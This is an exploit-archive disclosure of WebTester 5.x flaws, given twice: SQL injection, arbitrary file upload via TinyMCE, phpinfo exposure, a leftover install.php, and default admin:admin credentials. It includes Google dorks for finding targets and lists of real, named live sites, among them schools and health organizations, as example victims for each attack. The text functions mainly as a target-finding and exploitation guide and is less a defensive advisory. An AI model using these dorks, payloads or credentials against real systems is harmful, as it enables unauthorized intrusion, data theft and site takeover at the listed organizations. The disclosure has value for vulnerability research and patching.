WebTester 5.x Multiple Vulnerabilities

2013-10-27T00:00:00
ID SECURITYVULNS:DOC:29945
Type securityvulns
Reporter Securityvulns
Modified 2013-10-27T00:00:00

Description

========================================================================================== WebTester 5.x Multiple Vulnerabilities ==========================================================================================

:--------------------------------------------------------------------------------------------------------------------------

--------------: : # Exploit Title : WebTester 5.x Multiple Vulnerabilities
: # Date : 15 October 2013 : # Author : X-Cisadane : # CMS Developer : http://epplersoft.com/webtester.html : # CMS Source Code : http://sourceforge.net/projects/webtesteronline/ : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File : # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber,

Winda Utari :--------------------------------------------------------------------------------------------------------------------------

--------------:

DORKS (How to find the target) :

intext:Copyright © 2003 - 2010 Eppler Software inurl:/go.php?testID= intitle:WebTester Online Testing Or use your own Google Dorks :)

Proof of Concept

[ 1 ] SQL Injection POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi] Example : http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5 http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5 http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5 http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5 http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='5 ...etc...

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager. It can be found in tiny_mce/plugins/filemanager.

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Example the target is http://onlinetests.germaniak.eu/ Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Pic #1 : http://i40.tinypic.com/117z390.png Then tick : Insert filetype icon, Insert file size & Insert file modification date. Click upload and wait until the file sent to the server. Pic #2 : http://i39.tinypic.com/2wluaon.png Pic #3 : http://i40.tinypic.com/2uh0fir.png If the file was successfully uploaded, check in the /test-images/ directory. For Example : http://onlinetests.germaniak.eu/test-images/ http://www.rzecznik.org/test/test-images/ http://simula.se/fun/webtester5/test-images/ http://811lifestylecoach.com/test-images/ http://umpire-test.splashprojects.co.uk/test-images/ http://zamoweb.altervista.org/test-images/ ...etc...

[ 3 ] PHPInfo() Disclosure POC : http://[Site]/[Path]/phpinfo.php Example : http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php http://test.auzefiu.com/phpinfo.php http://test.deltaschools.com/phpinfo.php http://www.noordskool.com/toetse/phpinfo.php http://bocahomehealth.com/exam/phpinfo.php ...etc...

[ 4 ] Leftover install.php File POC : http://[Site]/[Path]/install.php Example : http://www.ibeucamposmacae.com.br/webtester5/install.php http://briefhealthprograms.com/webtester5/install.php http://intgvna.gardnervna.org/test/install.php http://delarcollege.com/POSTUTME/install.php http://www.orionhs.org/webtester/install.php ...etc...

Bonus : Default Username and Password Username : admin Password : admin Admin Control Panel : http://[Site]/[Path]/admin/

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!

Proof of Concept.txt

========================================================================================== WebTester 5.x Multiple Vulnerabilities ==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : WebTester 5.x Multiple Vulnerabilities
: # Date : 15 October 2013 : # Author : X-Cisadane : # CMS Developer : http://epplersoft.com/webtester.html : # CMS Source Code : http://sourceforge.net/projects/webtesteronline/ : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File : # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) :

intext:Copyright © 2003 - 2010 Eppler Software inurl:/go.php?testID= intitle:WebTester Online Testing Or use your own Google Dorks

Proof of Concept

[ 1 ] SQL Injection POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi] Example : http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5 http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5 http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5 http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5 http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='5 ...etc...

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager. It can be found in tiny_mce/plugins/filemanager.

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Example the target is http://onlinetests.germaniak.eu/ Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Pic #1 : http://i40.tinypic.com/117z390.png Then tick : Insert filetype icon, Insert file size & Insert file modification date. Click upload and wait until the file sent to the server. Pic #2 : http://i39.tinypic.com/2wluaon.png Pic #3 : http://i40.tinypic.com/2uh0fir.png If the file was successfully uploaded, check in the /test-images/ directory. For Example : http://onlinetests.germaniak.eu/test-images/ http://www.rzecznik.org/test/test-images/ http://simula.se/fun/webtester5/test-images/ http://811lifestylecoach.com/test-images/ http://umpire-test.splashprojects.co.uk/test-images/ http://zamoweb.altervista.org/test-images/ ...etc...

[ 3 ] PHPInfo() Disclosure POC : http://[Site]/[Path]/phpinfo.php Example : http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php http://test.auzefiu.com/phpinfo.php http://test.deltaschools.com/phpinfo.php http://www.noordskool.com/toetse/phpinfo.php http://bocahomehealth.com/exam/phpinfo.php ...etc...

[ 4 ] Leftover install.php File POC : http://[Site]/[Path]/install.php Example : http://www.ibeucamposmacae.com.br/webtester5/install.php http://briefhealthprograms.com/webtester5/install.php http://intgvna.gardnervna.org/test/install.php http://delarcollege.com/POSTUTME/install.php http://www.orionhs.org/webtester/install.php ...etc...

Bonus : Default Username and Password Username : admin Password : admin Admin Control Panel : http://[Site]/[Path]/admin/